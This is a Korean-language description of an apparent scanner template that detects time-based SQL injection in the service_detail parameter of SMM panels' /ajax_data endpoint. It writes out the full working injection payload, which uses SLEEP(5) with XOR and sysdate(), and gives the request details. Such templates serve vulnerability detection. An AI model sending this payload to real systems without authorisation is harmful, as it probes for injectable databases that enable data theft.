
SMM 패널을 위한 시간 기반 SQL 인젝션 탐지 템플릿입니다. 조작된 POST 요청을 `/ajax_data`로 전송하고 응답 지연 분석을 통해 취약한 엔드포인트를 식별합니다.
SMM 패널에 대한 시간 기반 SQL 인젝션 탐지
이 템플릿은 HTTP POST 요청을 통해 /ajax_data로 전송되는 SMM 패널의 service_detail 파라미터에서 시간 기반 SQL 인젝션 취약점을 탐지합니다. 악용 시 원격 공격자가 민감한 데이터에 접근하거나 권한을 상승시킬 수 있습니다.
이 도구는 조작된 POST 요청을 보냅니다:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
응답 시간이 5초보다 크면 취약한 엔드포인트를 나타냅니다.
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
